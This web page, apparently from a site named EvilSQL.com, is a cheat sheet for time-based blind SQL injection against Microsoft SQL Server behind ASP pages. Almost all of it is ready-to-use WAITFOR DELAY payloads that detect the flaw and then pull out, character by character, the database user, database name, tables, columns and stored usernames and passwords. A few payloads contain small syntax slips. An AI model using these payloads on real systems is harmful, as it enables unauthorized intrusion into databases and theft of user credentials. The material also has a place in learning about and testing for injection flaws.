Syler.Grey[at]gmail.com
| Microsoft SQL Blind Exploit | Microsoft SQL Error Exploit | Microsoft SQL Union Exploit |
DOM Cross Site Scripting Exploit | Simple AJAX Request Example |
| BLIND SQL INJECTION - DETECTION | |
|
Integer Injection: http://[site]/page.asp?id=1; WAITFOR DELAY '00:00:10'-- (+10 seconds) String Injection: http://[site]/page.asp?id=x'; WAITFOR DELAY '00:00:10'-- (+10 seconds)
|
|
BLIND SQL INJECTION - EXTRACT DATABASE USER |
|
|
3 - Total Characters http://[site]/page.asp?id=1; IF (LEN(USER)=1) WAITFOR DELAY '00:00:10'-- http://[site]/page.asp?id=1; IF (LEN(USER)=2) WAITFOR DELAY '00:00:10'-- http://[site]/page.asp?id=1; IF (LEN(USER)=3) WAITFOR DELAY '00:00:10'-- (+10 seconds) D - 1st Character http://[site]/page.asp?id=1; IF (ASCII(lower(substring((USER),1,1)))>97) WAITFOR DELAY '00:00:10'-- (+10 seconds) http://[site]/page.asp?id=1; IF (ASCII(lower(substring((USER),1,1)))=98) WAITFOR DELAY '00:00:10'-- http://[site]/page.asp?id=1; IF (ASCII(lower(substring((USER),1,1)))=99) WAITFOR DELAY '00:00:10'-- http://[site]/page.asp?id=1; IF (ASCII(lower(substring((USER),1,1)))=100) WAITFOR DELAY '00:00:10'-- (+10 seconds) B - 2nd Character http://[site]/page.asp?id=1; IF (ASCII(lower(substring((USER),2,1)))>97) WAITFOR DELAY '00:00:10'-- (+10 seconds) http://[site]/page.asp?id=1; IF (ASCII(lower(substring((USER),2,1)))=98) WAITFOR DELAY '00:00:10'-- (+10 seconds) O - 3rd Character http://[site]/page.asp?id=1; IF (ASCII(lower(substring((USER),3,1)))>97) WAITFOR DELAY '00:00:10'-- (+10 seconds) http://[site]/page.asp?id=1; IF (ASCII(lower(substring((USER),3,1)))>115) WAITFOR DELAY '00:00:10'-- http://[site]/page.asp?id=1; IF (ASCII(lower(substring((USER),3,1)))>105) WAITFOR DELAY '00:00:10'-- (+10 seconds) http://[site]/page.asp?id=1; IF (ASCII(lower(substring((USER),3,1)))>110) WAITFOR DELAY '00:00:10'-- (+10 seconds) http://[site]/page.asp?id=1; IF (ASCII(lower(substring((USER),3,1)))=109) WAITFOR DELAY '00:00:10'-- http://[site]/page.asp?id=1; IF (ASCII(lower(substring((USER),3,1)))=110) WAITFOR DELAY '00:00:10'-- (+10 seconds) Database User = DBO
|
|
| BLIND SQL INJECTION - EXTRACT DATABASE NAME | |
|
http://[site]/page.asp?id=1; IF (LEN(DB_NAME())=8) WAITFOR DELAY '00:00:10'-- (+10 seconds) http://[site]/page.asp?id=1; IF (ASCII(lower(substring((DB_NAME()),1,1)))=112) WAITFOR DELAY '00:00:10'-- (+10 seconds) http://[site]/page.asp?id=1; IF (ASCII(lower(substring((DB_NAME()),2,1)))=114) WAITFOR DELAY '00:00:10'-- (+10 seconds) http://[site]/page.asp?id=1; IF (ASCII(lower(substring((DB_NAME()),3,1)))=111) WAITFOR DELAY '00:00:10'-- (+10 seconds) http://[site]/page.asp?id=1; IF (ASCII(lower(substring((DB_NAME()),4,1)))=45) WAITFOR DELAY '00:00:10'-- (+10 seconds) http://[site]/page.asp?id=1; IF (ASCII(lower(substring((DB_NAME()),5,1)))=100) WAITFOR DELAY '00:00:10'-- (+10 seconds) http://[site]/page.asp?id=1; IF (ASCII(lower(substring((DB_NAME()),6,1)))=98) WAITFOR DELAY '00:00:10'-- (+10 seconds) http://[site]/page.asp?id=1; IF (ASCII(lower(substring((DB_NAME()),7,1)))=45) WAITFOR DELAY '00:00:10'-- (+10 seconds) http://[site]/page.asp?id=1; IF (ASCII(lower(substring((DB_NAME()),8,1)))=49) WAITFOR DELAY '00:00:10'-- (+10 seconds) Database Name = PRO-DB-1
|
|
| BLIND SQL INJECTION - EXTRACT 1st DATABASE TABLE | |
|
http://[site]/page.asp?id=1; IF (LEN(SELECT TOP 1 NAME from sysobjects where xtype='U')=5) WAITFOR DELAY '00:00:10'-- (+10 seconds) http://[site]/page.asp?id=1; IF (ASCII(lower(substring((SELECT TOP 1 NAME from sysobjects where xtype=char(85)),1,1)))=117) WAITFOR DELAY '00:00:10'-- (+10 seconds) http://[site]/page.asp?id=1; IF (ASCII(lower(substring((SELECT TOP 1 NAME from sysobjects where xtype=char(85)),2,1)))=115) WAITFOR DELAY '00:00:10'-- (+10 seconds) http://[site]/page.asp?id=1; IF (ASCII(lower(substring((SELECT TOP 1 NAME from sysobjects where xtype=char(85)),3,1)))=101) WAITFOR DELAY '00:00:10'-- (+10 seconds) http://[site]/page.asp?id=1; IF (ASCII(lower(substring((SELECT TOP 1 NAME from sysobjects where xtype=char(85)),4,1)))=114) WAITFOR DELAY '00:00:10'-- (+10 seconds) http://[site]/page.asp?id=1; IF (ASCII(lower(substring((SELECT TOP 1 NAME from sysobjects where xtype=char(85)),5,1)))=115) WAITFOR DELAY '00:00:10'-- (+10 seconds) Table Name = USERS
|
|
| BLIND SQL INJECTION - EXTRACT 2nd DATABASE TABLE | |
|
http://[site]/page.asp?id=1; IF (LEN(SELECT TOP 1 NAME from sysobjects where xtype=char(85) and name>'USERS')=6) WAITFOR DELAY '00:00:10'-- (+10 seconds) http://[site]/page.asp?id=1; IF (ASCII(lower(substring((SELECT TOP 1 NAME from sysobjects where xtype=char(85) and name>'USERS'),1,1)))=111) WAITFOR DELAY '00:00:10'-- (+10 seconds) http://[site]/page.asp?id=1; IF (ASCII(lower(substring((SELECT TOP 1 NAME from sysobjects where xtype=char(85) and name>'USERS'),2,1)))=114) WAITFOR DELAY '00:00:10'-- (+10 seconds) http://[site]/page.asp?id=1; IF (ASCII(lower(substring((SELECT TOP 1 NAME from sysobjects where xtype=char(85) and name>'USERS'),3,1)))=100) WAITFOR DELAY '00:00:10'-- (+10 seconds) http://[site]/page.asp?id=1; IF (ASCII(lower(substring((SELECT TOP 1 NAME from sysobjects where xtype=char(85) and name>'USERS'),4,1)))=101) WAITFOR DELAY '00:00:10'-- (+10 seconds) http://[site]/page.asp?id=1; IF (ASCII(lower(substring((SELECT TOP 1 NAME from sysobjects where xtype=char(85) and name>'USERS'),5,1)))=114) WAITFOR DELAY '00:00:10'-- (+10 seconds) http://[site]/page.asp?id=1; IF (ASCII(lower(substring((SELECT TOP 1 NAME from sysobjects where xtype=char(85) and name>'USERS'),6,1)))=115) WAITFOR DELAY '00:00:10'-- (+10 seconds) Table Name = ORDERS
|
|
| BLIND SQL INJECTION - EXTRACT 3rd DATABASE TABLE | |
|
http://[site]/page.asp?id=1; IF (LEN(SELECT TOP 1 NAME from sysobjects where xtype=char(85) and name>'ORDERS')=9) WAITFOR DELAY '00:00:10'-- (+10 seconds) http://[site]/page.asp?id=1; IF (ASCII(lower(substring((SELECT TOP 1 NAME from sysobjects where xtype=char(85) and name>'ORDERS'),1,1)))=99) WAITFOR DELAY '00:00:10'-- (+10 seconds) http://[site]/page.asp?id=1; IF (ASCII(lower(substring((SELECT TOP 1 NAME from sysobjects where xtype=char(85) and name>'ORDERS'),2,1)))=117) WAITFOR DELAY '00:00:10'-- (+10 seconds) http://[site]/page.asp?id=1; IF (ASCII(lower(substring((SELECT TOP 1 NAME from sysobjects where xtype=char(85) and name>'ORDERS'),3,1)))=115) WAITFOR DELAY '00:00:10'-- (+10 seconds) http://[site]/page.asp?id=1; IF (ASCII(lower(substring((SELECT TOP 1 NAME from sysobjects where xtype=char(85) and name>'ORDERS'),4,1)))=116) WAITFOR DELAY '00:00:10'-- (+10 seconds) http://[site]/page.asp?id=1; IF (ASCII(lower(substring((SELECT TOP 1 NAME from sysobjects where xtype=char(85) and name>'ORDERS'),5,1)))=111) WAITFOR DELAY '00:00:10'-- (+10 seconds) http://[site]/page.asp?id=1; IF (ASCII(lower(substring((SELECT TOP 1 NAME from sysobjects where xtype=char(85) and name>'ORDERS'),6,1)))=109) WAITFOR DELAY '00:00:10'-- (+10 seconds) http://[site]/page.asp?id=1; IF (ASCII(lower(substring((SELECT TOP 1 NAME from sysobjects where xtype=char(85) and name>'ORDERS'),7,1)))=101) WAITFOR DELAY '00:00:10'-- (+10 seconds) http://[site]/page.asp?id=1; IF (ASCII(lower(substring((SELECT TOP 1 NAME from sysobjects where xtype=char(85) and name>'ORDERS'),8,1)))=114) WAITFOR DELAY '00:00:10'-- (+10 seconds) http://[site]/page.asp?id=1; IF (ASCII(lower(substring((SELECT TOP 1 NAME from sysobjects where xtype=char(85) and name>'ORDERS'),9,1)))=115) WAITFOR DELAY '00:00:10'-- (+10 seconds) Table Name = CUSTOMERS
|
|
| BLIND SQL INJECTION - EXTRACT 1st TABLE COLUMN NAME | |
|
http://[site]/page.asp?id=1; IF (LEN(SELECT TOP 1 column_name from PRO-DB-1.information_schema.columns where table_name='USERS')=4) WAITFOR DELAY '00:00:10'-- (+10 seconds) http://[site]/page.asp?id=1; IF (ASCII(lower(substring((SELECT TOP 1 column_name from PRO-DB-1.information_schema.columns where table_name='USERS'),1,1)))=117) WAITFOR DELAY '00:00:10'-- (+10 seconds) http://[site]/page.asp?id=1; IF (ASCII(lower(substring((SELECT TOP 1 column_name from PRO-DB-1.information_schema.columns where table_name='USERS'),2,1)))=115) WAITFOR DELAY '00:00:10'-- (+10 seconds) http://[site]/page.asp?id=1; IF (ASCII(lower(substring((SELECT TOP 1 column_name from PRO-DB-1.information_schema.columns where table_name='USERS'),3,1)))=101) WAITFOR DELAY '00:00:10'-- (+10 seconds) http://[site]/page.asp?id=1; IF (ASCII(lower(substring((SELECT TOP 1 column_name from PRO-DB-1.information_schema.columns where table_name='USERS'),4,1)))=114) WAITFOR DELAY '00:00:10'-- (+10 seconds) Column Name = USER
|
|
| BLIND SQL INJECTION - EXTRACT 2nd TABLE COLUMN NAME | |
|
http://[site]/page.asp?id=1; IF (LEN(SELECT TOP 1 column_name from PRO-DB-1.information_schema.columns where table_name='USERS' and column_name>'USER')=4) WAITFOR DELAY '00:00:10'-- (+10 seconds) http://[site]/page.asp?id=1; IF (ASCII(lower(substring((SELECT TOP 1 column_name from PRO-DB-1.information_schema.columns where table_name='USERS' and column_name>'USER'),1,1)))=112) WAITFOR DELAY '00:00:10'-- (+10 seconds) http://[site]/page.asp?id=1; IF (ASCII(lower(substring((SELECT TOP 1 column_name from PRO-DB-1.information_schema.columns where table_name='USERS' and column_name>'USER'),2,1)))=97) WAITFOR DELAY '00:00:10'-- (+10 seconds) http://[site]/page.asp?id=1; IF (ASCII(lower(substring((SELECT TOP 1 column_name from PRO-DB-1.information_schema.columns where table_name='USERS' and column_name>'USER'),3,1)))=115) WAITFOR DELAY '00:00:10'-- (+10 seconds) http://[site]/page.asp?id=1; IF (ASCII(lower(substring((SELECT TOP 1 column_name from PRO-DB-1.information_schema.columns where table_name='USERS' and column_name>'USER'),4,1)))=115) WAITFOR DELAY '00:00:10'-- (+10 seconds) Column Name = PASS
|
|
| BLIND SQL INJECTION - EXTRACT 3rd TABLE COLUMN NAME | |
|
http://[site]/page.asp?id=1; IF (LEN(SELECT TOP 1 column_name from PRO-DB-1.information_schema.columns where table_name='USERS' and column_name>,'PASS')=2) WAITFOR DELAY '00:00:10'-- (+10 seconds) http://[site]/page.asp?id=1; IF (ASCII(lower(substring((SELECT TOP 1 column_name from PRO-DB-1.information_schema.columns where table_name='USERS' and column_name>'PASS'),1,1)))=105) WAITFOR DELAY '00:00:10'-- (+10 seconds) http://[site]/page.asp?id=1; IF (ASCII(lower(substring((SELECT TOP 1 column_name from PRO-DB-1.information_schema.columns where table_name='USERS' and column_name>'PASS'),2,1)))=100) WAITFOR DELAY '00:00:10'-- (+10 seconds) Column Name = ID
|
|
| BLIND SQL INJECTION - EXTRACT 1st FIELD OF 1st ROW | |
|
http://[site]/page.asp?id=1; IF (LEN(SELECT TOP 1 USER from USERS)=5) WAITFOR DELAY '00:00:10'-- (+10 seconds) http://[site]/page.asp?id=1; IF (ASCII(substring((SELECT TOP 1 USER from USERS),1,1))=97) WAITFOR DELAY '00:00:10'-- (+10 seconds) http://[site]/page.asp?id=1; IF (ASCII(substring((SELECT TOP 1 USER from USERS),2,1))=100) WAITFOR DELAY '00:00:10'-- (+10 seconds) http://[site]/page.asp?id=1; IF (ASCII(substring((SELECT TOP 1 USER from USERS),3,1))=109) WAITFOR DELAY '00:00:10'-- (+10 seconds) http://[site]/page.asp?id=1; IF (ASCII(substring((SELECT TOP 1 USER from USERS),4,1))=105) WAITFOR DELAY '00:00:10'-- (+10 seconds) http://[site]/page.asp?id=1; IF (ASCII(substring((SELECT TOP 1 USER from USERS),5,1))=110) WAITFOR DELAY '00:00:10'-- (+10 seconds) Field Data = ADMIN
|
|
| BLIND SQL INJECTION - EXTRACT 2nd FIELD OF 1st ROW | |
|
http://[site]/page.asp?id=1; IF (LEN(SELECT TOP 1 PASS from USERS)=3) WAITFOR DELAY '00:00:10'-- (+10 seconds) http://[site]/page.asp?id=1; IF (ASCII(substring((SELECT TOP 1 PASS from USERS),1,1))=49) WAITFOR DELAY '00:00:10'-- (+10 seconds) http://[site]/page.asp?id=1; IF (ASCII(substring((SELECT TOP 1 PASS from USERS),2,1))=50) WAITFOR DELAY '00:00:10'-- (+10 seconds) http://[site]/page.asp?id=1; IF (ASCII(substring((SELECT TOP 1 PASS from USERS),3,1))=51) WAITFOR DELAY '00:00:10'-- (+10 seconds) Field Data = 123
|
|
| BLIND SQL INJECTION - EXTRACT 3nd FIELD OF 1st ROW | |
|
http://[site]/page.asp?id=1; IF (LEN(SELECT TOP 1 ID from USERS)=3) WAITFOR DELAY '00:00:10'-- (+10 seconds) http://[site]/page.asp?id=1; IF (ASCII(substring((SELECT TOP 1 ID from USERS),1,1))=49) WAITFOR DELAY '00:00:10'-- (+10 seconds) http://[site]/page.asp?id=1; IF (ASCII(substring((SELECT TOP 1 ID from USERS),2,1))=48) WAITFOR DELAY '00:00:10'-- (+10 seconds) http://[site]/page.asp?id=1; IF (ASCII(substring((SELECT TOP 1 ID from USERS),3,1))=48) WAITFOR DELAY '00:00:10'-- (+10 seconds) Field Data = 100
|
|
| BLIND SQL INJECTION - EXTRACT 1st FIELD OF 2nd ROW | |
|
http://[site]/page.asp?id=1; IF (LEN(SELECT TOP 1 USER from USERS where USER NOT in ('ADMIN') order by USERS desc)=3) WAITFOR DELAY '00:00:10'-- (+10 seconds) http://[site]/page.asp?id=1; IF (ASCII(lower(substring((SELECT TOP 1 USER from USERS where USER NOT in ('ADMIN') order by USER desc),1,1)))=106) WAITFOR DELAY '00:00:10'-- (+10 seconds) http://[site]/page.asp?id=1; IF (ASCII(lower(substring((SELECT TOP 1 USER from USERS where USER NOT in ('ADMIN') order by USER desc),2,1)))=111) WAITFOR DELAY '00:00:10'-- (+10 seconds) http://[site]/page.asp?id=1; IF (ASCII(lower(substring((SELECT TOP 1 USER from USERS where USER NOT in ('ADMIN') order by USER desc),3,1)))=101) WAITFOR DELAY '00:00:10'-- (+10 seconds) Field Data = JOE
|
|
| BLIND SQL INJECTION - EXTRACT 1st FIELD OF 3nd ROW | |
|
http://[site]/page.asp?id=1; IF (LEN(SELECT TOP 1 USER from USERS where USER NOT in ('JOE') order by USERS desc)=3) WAITFOR DELAY '00:00:10'-- (+10 seconds) http://[site]/page.asp?id=1; IF (ASCII(lower(substring((SELECT TOP 1 USER from USERS where USER NOT in ('JOE') order by USER desc),1,1)))=106) WAITFOR DELAY '00:00:10'-- (+10 seconds) http://[site]/page.asp?id=1; IF (ASCII(lower(substring((SELECT TOP 1 USER from USERS where USER NOT in ('JOE') order by USER desc),2,1)))=105) WAITFOR DELAY '00:00:10'-- (+10 seconds) http://[site]/page.asp?id=1; IF (ASCII(lower(substring((SELECT TOP 1 USER from USERS where USER NOT in ('JOE') order by USER desc),3,1)))=109) WAITFOR DELAY '00:00:10'-- (+10 seconds) Field Data = JIM
|
|
|
This website is available for your personal use and viewing. Access and use by you of this site constitutes acceptance by you of these Terms and Conditions that take effect from the date of first use. You agree to use this website only for lawful purposes, and in a manner that does not infringe the rights of, or restrict or inhibit the use and enjoyment of this site by any other third party. EvilSQL.com shall have no liability to any person for the accuracy or contents of the security advice published on this website. EvilSQL.com assumes no responsibility to any person. No warranties are given. No liability is accepted for any inclusion or omission herefrom or the absence of any other information or matter. Furthermore, no liability or responsibility is accepted for any further advice given or omission to give further advice, prior to or subsequent to the advice published on this website. |